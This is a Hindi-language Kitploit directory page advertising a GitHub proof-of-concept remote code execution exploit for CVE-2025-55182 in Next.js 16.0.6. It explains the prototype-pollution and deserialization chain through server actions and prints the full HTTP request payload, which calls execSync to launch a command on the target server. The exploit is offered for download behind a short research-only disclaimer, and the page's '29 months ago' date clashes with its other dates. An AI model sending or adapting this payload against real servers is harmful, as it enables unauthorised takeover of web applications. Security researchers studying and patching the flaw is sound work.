Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-RCE-Exploit — अधिक शोषण-केंद्रित; सुरक्षा अनुसंधान रिपॉजिटरी के लिए बढ़िया। | Kitploit
उपकरण/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

अधिक शोषण-केंद्रित; सुरक्षा अनुसंधान रिपॉजिटरी के लिए बढ़िया।

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 के लिए POC – Next.js 16.0.6 रिमोट कोड निष्पादन

इस रिपॉजिटरी में CVE-2025-55182 के लिए एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट (POC) शामिल है, जो Next.js 16.0.6 को प्रभावित करने वाली एक गंभीर डिसीरियलाइजेशन कमजोरी है। यह शोषण $@ चंक डिसीरियलाइजेशन और Chunk.prototype.then का दुरुपयोग करके चंक रिज़ॉल्यूशन प्रक्रिया पर पूर्ण नियंत्रण प्राप्त करता है और सर्वर पर मनमाना कोड निष्पादन (RCE) प्राप्त करता है।

कमजोरी का सारांश

Next.js सर्वर एक्शन के लिए आंतरिक Chunk ऑब्जेक्ट और स्ट्रीमिंग/डिसीरियलाइजेशन तंत्र का उपयोग करता है। $@ का दुरुपयोग करके Chunk संदर्भ को डिसीरियलाइज़ करके और रूट ऑब्जेक्ट में Chunk.prototype.then इंजेक्ट करके, एक हमलावर निम्नलिखित कर सकता है:

  • Next.js को हमलावर-नियंत्रित this के साथ कॉल करने के लिए मजबूर कर सकता है
then(...)
  • चंक status को resolved_model पर सेट कर सकता है
  • हमलावर द्वारा पूरी तरह नियंत्रित नकली चंक के साथ initializeModelChunk ट्रिगर कर सकता है
  • खतरनाक आंतरिक व्यवहार तक पहुंचने के लिए chunk._response विधियों का दुरुपयोग कर सकता है
  • अंतिम लक्ष्य Blob डिसीरियलाइजेशन को ट्रिगर करना है, जो इस तरह का कॉल निष्पादित करता है:

    root@kitploit:~
    response._formData.get(response._prefix)
    

    response._formData.get = Function सेट करके और response._prefix में मनमाना कोड डालकर, हमलावर मनमाना सिस्टम कमांड निष्पादित कर सकता है।

    शोषण POC

    poc/CVE-2025-55182.http में HTTP अनुरोध स्थानीय रूप से चल रहे Next.js 16.0.6 के विरुद्ध शोषण प्रदर्शित करता है, जो child_process.execSync के माध्यम से xcalc स्पॉन करता है:

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: x
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Length: 459
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    

    रिपॉजिटरी लेआउट

    root@kitploit:~
    /
    ├── README.md
    ├── DISCLAIMER.md
    ├── poc/
    │   └── CVE-2025-55182.http
    └── analysis/
        └── exploitation-notes.md
    

    अस्वीकरण

    यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। किसी भी सिस्टम पर इस शोषण का उपयोग न करें जिसके आप मालिक नहीं हैं या जिसके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।

    लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

    टूल डाउनलोड करें